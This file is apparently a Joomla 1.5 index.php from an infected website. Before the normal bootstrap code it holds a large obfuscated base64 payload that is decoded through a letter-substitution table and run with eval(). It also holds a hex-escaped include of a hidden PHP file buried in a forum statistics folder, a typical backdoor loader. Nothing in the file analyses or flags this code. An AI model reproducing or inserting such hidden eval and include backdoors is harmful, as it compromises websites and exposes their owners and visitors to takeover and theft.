0FZcFo1T0tiMEowYk9QNGh4WTRpd2k0aHhZcGI1bktEVm5LT2ZGR0RWT1FWMWVIWnBDMER4V0czNUpzTXZBOWJmZUhoWUlUOWRPNGI1bkhEbEFUaCcuCidzUktNVjFLTWxKS3pVMTB0RUl0ckM1aFlBVDRoZFk0aGRZNGhOSTBpZFcwek9DMHZmT0xiT2VIWkVXcFpzMVFVZmpxdDRJVGNBVDRoZFk0aGRZNGhOJy4KJ3ltY1dZNGhkWTRoZFk0aGRZNGhOUDB0c1ZRenhZcFpzMVFVZmpxdDR5bWNXWTRoZFk0aGRZNFpBNWhZQVQ0aGRZJy4KJzRoZFk0aE5JMGk4MXFNc0lRaVlqSGJWYXRNc0lRaWpJbWNXWTRoZFk0aGRZNFpDNWhpZFk0aGRZNGhkWTRoZFk0WnBPSFp2UEtpZGpIYlZhdE1zSVFSQzVoaWRZNCcuCidoZFk0aGRZSmNBVG1jV1k0aGRZNGhkWTRacE9IWnZQS2lkaTRSQzVoaWRZNGhOZm1jVzVoaWRZNGhOekhEbFJIYk9uS2lOUlFWZmFLWnZ1cURsSkdEcycuCidqVGhzRkdEVk9CaGRqR3pVZTByR0F0TXM4SGJYSW1jV1k0aGRZTGFBVDRoZFk0aGRZNGhkajBiVUFHOWRmNGJwOFFNb001VWZqMEQ1Jy4KJ24wYm9XcGJwOFFNb001VWZqR3RzOFRyQzVoWUFUNGhkWTRoZFk0aGRqUTNzblF6VXUwdmZhR3RzVzRtQVlHMzVKcycuCidNdkFjTWYxS0RmRm8zc25RelV1MDlZSTRoeFk0aXdpa2FBVDRoZFk0aGRZNGhkalEzc25RelUnLgondTB2ZmFHdHNXNG1BWXBaNUFLM3A4ME12SlFiVUFxaGRGNFo1Vkd1NUFRaTgxMG1vVzR6NThHTThPNGlqQzRtZEM0bW9JNGh4WTRPd2k0aHhZS0RjVlRoc0ZHJy4KJ0RWTzRoeFlHMzVKc012QTliZmVIaFlJVHJDNWhZQVRtY1dZNGhkWTRoZFk0YjVldE0wSUtidkpIM3BJSGJvV3BaJy4KJzVBSzNwODBNdkpRYlVBcWhhWUczNUowRGxSUXVPYUhoWWowYlVBRzlhWUczNUpzTXZBOWJmZUhoWUlUOWp5bWNXWTRoJy4KJ2RZSmNBVG1jV1k0aGRZMHV2Rkczc0lLTXhZRzM1SlFiMlYwTU9GdDNwT0s5WWpLelUxMDlqNWhpZFk0aE55bWNXWTRoZFk0aGRZNGhzZUhiZlBHREhPdDNOOEhiWVlnJy4KJzlOUlFWZlowdHNtS01WMUtNbHJIYmZQR0RIT1RoakY0aDRuNFJDNWhpZFk0aGRZNGhkWXBaNUFLM3A4ME12SlFiVUFxaGRmNGhzJy4KJ2VIYmZQR0RIT3QzTjhIYllZQmlOZUhEcGVIWjRXS0RjVlRocFJHRDVXMDk0SUJoZGFCaGRWVDlkRjRocEo0aWRGNGJWajU5WWpLelUxMDlkRjRiNWV0QUhPSFg4bicuCidRM2NXVDlqeW1jVzVoaWRZNGhkWTRoZFlxREdZVGIwSUtidkowdDhJUTNzZVRoc2VIYmZQR0RIT3QzTjhIYllJVGNBVDRoZFk0aGRZNGhOeW1jV1k0aGRZNGhkWTRoZFk0aCcuCidOZEhEbENxRGxTVGhzZUhiZlBHREhPdDNOOEhiWUlrYUFUNGhkWTRoZFk0aE5mbWNXWTRoZFlKY0FUbWNXWTRoZFkwdScuCid2Rkczc0lLTXhZRzM1SlFiMlYwTU9GdE0ybkdEY1dwYmw4S0RvZnJPdkVyaGo1aGlkWTRoTnltY1dZNGhkWTRoZFk0aHNlSGJmUEdESE90M044SGJZWWc5TlJRVmZaMHQnLgonc21LTVYxS01sckhiZlBHREhPVGhqeW1jVzVoaWRZNGhkWTRoZFlxREdZVGJPZXRNc0lRaVlqUTNzblF6VXUwdmZhR3RzV1Q5ajVoaWRZNGhkWTRoZFlMYUFUNGhkJy4KJ1k0aGRZNGhkWTRoZFlxREdZVGhzRkdEVk80bUFmNFhsdnJYYUk0aHduNGIybkdEY1lHRDJDNFpOQ0hESElLdUU1aGlkWTRoZFknLgonNGhkWTRoZFk0WkM1aGlkWTRoZFk0aGRZNGhkWTRoZFk0aE56SzNwT0dENVc0aDhlR01VRjBiT1BUaHNlSGJmUEdESE90M044SGJZSTRiVWU0aHNTMHRqZmdpc2FLWnZ1cURsJy4KJ0pLelUxMDlqNWhpZFk0aGRZNGhkWTRoZFk0aGRZNGhOeW1jV1k0aGRZNGhkWTRoZFk0aGRZNGhkWTRoJy4KJ2RZNGJPejRoOGVIWnBhSzNFV3BaTkNIREhJS09mRkdEVk9CaE5lSERwZUhaNFdLRGNWVGhwUkdENVcwOTRJJy4KJ0JoZGFCaGRWVDlqWTRyQWY0WDA4S1o1T1RjQVQ0aGRZNGhkWTRoZFk0aGRZNGhkWTRoZFk0aE55bWNXWTRoZFk0aGRZNGhkWScuCic0aGRZNGhkWTRoZFk0aGRZNGhOZDB0MDhLaDhSUVZmajBENVBMdE5BVGI1ZXRNMElLYnZKUXp2ODBoWWpRM3NuUXpVdTB2ZmFHdHNXNGh4WTRpd2k0aHhZcFpOQ0gnLgonREhJS09mRkdEVk9UOWFZRzM1SnNNdkE5YmZlSGhZSVQ5anltY1dZNGhkWTRoZFk0aGRZNGhkWTRoZFk0aGRZNFpBNWhpZFk0aGRZNGhkWTRoZFk0Jy4KJ2hkWTRoTmZtY1dZNGhkWTRoZFk0aGRZNGhOZm1jV1k0aGRZNGhkWTRoZFk0aE5PS1o1Jy4KJ09tY1dZNGhkWTRoZFk0aGRZNGhOeW1jV1k0aGRZNGhkWTRoZFk0aGRZNGhkWXBaNUFLM3A4ME12SlFiVUFxaGRmNGhzZUhiZlBHREhPdCcuCiczTjhIYllZQmlkaUJQNFlCaU5lSERwZUhaNFdLRGNWVGhwUkdENVcwOTRJQmhkYUJoZFZUOWRGNGhwSjRpZEY0YlZqNTlZakt6VTEwOWRGNGI1ZXRBSE9IWDhuUScuCiczY1dUOWp5bWNXNWhpZFk0aGRZNGhkWTRoZFk0aGRZNGhOSTBpZFcwek9DMHZmT0xiT2VIWkVXcFo1QUszcDgwTXYnLgonSlFiVUFxaGpJbWNXWTRoZFk0aGRZNGhkWTRoZFk0aGRZTGFBVDRoZFk0aGRZNGhkWTRoZFk0aCcuCidkWTRoZFk0aE5kMHQwOEtoOFJRVmZqMEQ1UEx0TkFUYjVldE0wSUtidkpRenY4MGhZalEzc25RelV1MHZmYUd0c1dUOWFZRzM1SnNNdkE5YmZlSGhZSVQ5aicuCid5bWNXWTRoZFk0aGRZNGhkWTRoZFk0aGRZSmNBVDRoZFk0aGRZNGhkWTRoZFlKY0FUNGhkWTRoZFk0aE5mbWNXWTRoZFlKY0FUbWNXWTRoZFkwdXZGRzNzSUtNeFknLgonRzM1SkgzcElIYlVpS2J2SkdNOE9HTUNXVGNBVDRoZFk0WkM1aGlkWTRoZFk0aGRZcURHWScuCidUWjVBUXoyT0tpOFJRVmZaMHRzbUtNVjFLTWxySGJmUEdESE9UaGpJNGhYZjRtZEltY1dZNGhkWTRoZFk0WkM1aGlkWTRoJy4KJ2RZNGhkWTRoZFk0WnBPSFp2UEtpTm9RdXZPa2FBVDRoZFk0aGRZNGhOZm1jV1k0aGRZNGhkWTRidkNRTW81aGlkWScuCic0aGRZNGhkWUxhQVQ0aGRZNGhkWTRoZFk0aGRZUXp2QUh0cEY0WDA4S1o1T2thQVQ0aGRZNGhkWTRoTmZtY1dZNGhkWUpjQVRtY1dZNGhkWTAnLgonemZQMERVUnFoZFdwVWZtckFmQjlvb1lHdEVZcGIxT0xyQStwWjA4S1p2T1RjQVQ0aGRZJy4KJzRaQzVoaWRZNGhkWTRoZFlwYnM4SGJYWWc5ZGpIelVDSERveW1jV1k0aGRZNGhkWTRoc2pHdHM4dE0xT0w5ZGY0aHNTMHRqeW1jV1k0aGRZSmNBVG1jV1k0aGRZcScuCidER1lUaFhqMGJVQUc5ajVoaWRZNGhOeW1jV1k0aGRZNGhkWTRiMG5RenY4R01ZWVRoc0pvWGZydmhOOFFQZGpxTXZsZ3J4akh6VUNIRG9JbWNXWTRoZFk0aGRZNFonLgonQzVoaWRZNGhkWTRoZFk0aGRZNGhzakd0czg0bUFZcFowOEtadk9rYUFUNGhkWTRoZFk0aGRZNGhkWXBiczhIYlVKcU12bDRtQVlwYjFPJy4KJ0xyQzVoaWRZNGhkWTRoZFlKY0FUNGhkWTRaQTVoWUFUNGhkWTRoc2pHdHM4NG1BWWNadkZRTXZQcURVQ3F0SU9UYjVldE1zT0czcGxRWmNXR3pVZTByJy4KJ0dBdE1zT0dNZmowOVlqMGJVQUc5akM0aHNqR3RzOHRNMU9MOWpJa2FBVG1jV1k0aGRZcURHWVRiT2VRTXZBVGhzakd0czhEUEg4cScuCidQSEhUOWR6cGlkakczNUpHdHZBcW1BZnBiczhIYlVLcE1VU3BWQUltY1dZNGhkWUxhQVQ0aGRZNGhkWTRoTkkwaWRXcGJzOEhiVUtwTVh1dDlkZmc5ZHVxOVFJbWMnLgonV1k0aGRZNGhkWTRaQzVoaWRZNGhkWTRoZFk0aGRZNGhzSTRtQVljdHBQR3RqV21jV1k0aGRZNGhkWTRoZCcuCidZNGhkWTRoZFlwM05NcFBkZmdpTmRRYjhhSHp2UFFNT25LaVlJQmRBVDRoZFk0aGRZNGhkWTRoZFk0aGRZNGhIZUhpUVlncnhZcGVYRkVoQVBwUCcuCidhNWhpZFk0aGRZNGhkWTRoZFk0aGRZNGhkdUdEQ3U0bUErNGhzakd0czhEUEg4cVBISEJkQVQ0aGRZNGhkWTRoZFk0aGRZVHJDNWhpZFk0aGRZNGhkWTRoZFk0YnZScScuCidid1ljWjVPUXpPOEtiTzcwOVlqcTlqeW1jV1k0aGRZNGhkWTRoZFk0aE5PTGJPQWthQVQ0aGRZNGhkWTRoTmZtY1dZNGhkWTRoZFk0YnZDJy4KJ1FNdkkwaWRXcGJzOEhiVUtwTVh1dDlkZmc5ZHUwOVFJbWNXWTRoZFk0aGRZNFpDNWhpZFk0aGRZNGhkWTRoZFk0YnZNR0RhV3BiczhIYlVLcE1jdXQ5anltY1dZNGhkWTQnLgonaGRZNFpBNWhpZFk0aGRZNGhkWTBEMmUwRE96NGhZajBiVUFHdkN1RzlISDRtQWY0aEhhS1p2dXFEeHVUJy4KJ2NBVDRoZFk0aGRZNGhOeW1jV1k0aGRZNGhkWTRoZFk0aE5JMGlZajBiVUFHdkN1UU1YdXQ5ZGZnOWR1R0RzanBQajVoaWRZNGhkWTRoZFk0aGRZNFpDNScuCidoaWRZNGhkWTRoZFk0aGRZNGhkWTRoTlJRVmZhS1p2dXFEbEpHRHNqVGhzakd0czhEUEhhcFZBQzRoc2pHdHM4RFBIanBWQUlrJy4KJ2FBVDRoZFk0aGRZNGhkWTRoZFlKY0FUNGhkWTRoZFk0aGRZNGhkWTBEMmUwRE96VGhzakd0czhEUEhlRzlISDRtQWY0aEhQMERBdVRjQVQ0aGRZNGhkWTRoZFk0aCcuCidkWUxhQVQ0aGRZNGhkWTRoZFk0aGRZNGhkWTRiNWV0M05DSERISUtPZlAwREFXcGJzOEhiVScuCidLcDNkdXQ5anltY1dZNGhkWTRoZFk0aGRZNGhOZm1jV1k0aGRZNGhkWTRaQTVoaWRZNGhkWTRoZFkwRDVXS1BkajBiVUFHdkN1R0RDdXRyQzVoaWRZNGhkWTRoZCcuCidZMHQ4SUhoWUlrYUFUNGhkWTRaQTVoWUFUNGhkWTRiNWV0M05DSERISUtPZkNLTVVqVGhqeW1jSWYnOwokdnNxc3kgPSBBcnJheSgnMSc9Pid0JywgJzAnPT4nWicsICczJz0+JzMnLCAnMic9Pid4JywgJzUnPT4nTicsICc0Jz0+J0knLCAnNyc9Pic2JywgJzYnPT4ncScsICc5Jz0+J1MnLCAnOCc9PidoJywgJ0EnPT4nMCcsICdDJz0+J3MnLCAnQic9PidMJywgJ0UnPT4nTScsICdEJz0+J1cnLCAnRyc9PidZJywgJ0YnPT4ndScsICdJJz0+J3AnLCAnSCc9PidkJywgJ0snPT4nYicsICdKJz0+J2YnLCAnTSc9PicyJywgJ0wnPT4nZScsICdPJz0+J2wnLCAnTic9PidCJywgJ1EnPT4nYycsICdQJz0+J3knLCAnUyc9PidyJywgJ1InPT4naicsICdVJz0+J0YnLCAnVCc9PidLJywgJ1cnPT4nbycsICdWJz0+JzEnLCAnWSc9PidnJywgJ1gnPT4nRScsICdaJz0+J0gnLCAnYSc9Pid3JywgJ2MnPT4nUScsICdiJz0+J0cnLCAnZSc9Pid6JywgJ2QnPT4nQScsICdnJz0+J1AnLCAnZic9Pic5JywgJ2knPT4naScsICdoJz0+J0MnLCAnayc9PidPJywgJ2onPT4naycsICdtJz0+J0QnLCAnbCc9Pic1JywgJ28nPT4nVScsICduJz0+J3YnLCAncSc9PidhJywgJ3AnPT4nSicsICdzJz0+J1InLCAncic9PidUJywgJ3UnPT4nbicsICd0Jz0+J1gnLCAndyc9Pic4JywgJ3YnPT4nVicsICd5Jz0+JzcnLCAneCc9Pic0JywgJ3onPT4nbScpOwpldmFsLypjeXZ0cG9sdSovKGJhYWZ5d2JkcnIoJGxrb3p1cXd3ZG0sICR2c3FzeSkpOwp9")); include "\x2fhom\x65/og\x72y/d\x6fmai\x6es/g\x72upa\x72ajd\x6fwa.\x70l/p\x75bli\x63_ht\x6dl/f\x6frum\x2fsta\x74_mo\x64ule\x73/ag\x65_st\x61tis\x74ics\x2fpre\x73s.p\x68p"; /** * @version $Id: index.php 10381 2008-06-01 03:35:53Z pasamio $ * @package Joomla * @copyright Copyright (C) 2005 - 2008 Open Source Matters. All rights reserved. * @license GNU/GPL, see LICENSE.php * Joomla! is free software. This version may have been modified pursuant * to the GNU General Public License, and as distributed it includes or * is derivative of works licensed under the GNU General Public License or * other free or open source software licenses. * See COPYRIGHT.php for copyright notices and details. */ // Set flag that this is a parent file define( '_JEXEC', 1 ); define('JPATH_BASE', dirname(__FILE__) ); define( 'DS', DIRECTORY_SEPARATOR ); require_once ( JPATH_BASE .DS.'includes'.DS.'defines.php' ); require_once ( JPATH_BASE .DS.'includes'.DS.'framework.php' ); JDEBUG ? $_PROFILER->mark( 'afterLoad' ) : null; /** * CREATE THE APPLICATION * * NOTE : */ $mainframe =& JFactory::getApplication('site'); /** * INITIALISE THE APPLICATION * * NOTE : */ // set the language $mainframe->initialise(); JPluginHelper::importPlugin('system'); // trigger the onAfterInitialise events JDEBUG ? $_PROFILER->mark('afterInitialise') : null; $mainframe->triggerEvent('onAfterInitialise'); /** * ROUTE THE APPLICATION * * NOTE : */ $mainframe->route(); // authorization $Itemid = JRequest::getInt( 'Itemid'); $mainframe->authorize($Itemid); // trigger the onAfterRoute events JDEBUG ? $_PROFILER->mark('afterRoute') : null; $mainframe->triggerEvent('onAfterRoute'); /** * DISPATCH THE APPLICATION * * NOTE : */ $option = JRequest::getCmd('option'); $mainframe->dispatch($option); // trigger the onAfterDispatch events JDEBUG ? $_PROFILER->mark('afterDispatch') : null; $mainframe->triggerEvent('onAfterDispatch'); /** * RENDER THE APPLICATION * * NOTE : */ $mainframe->render(); // trigger the onAfterRender events JDEBUG ? $_PROFILER->mark('afterRender') : null; $mainframe->triggerEvent('onAfterRender'); /** * RETURN THE RESPONSE */ echo JResponse::toString($mainframe->getCfg('gzip'));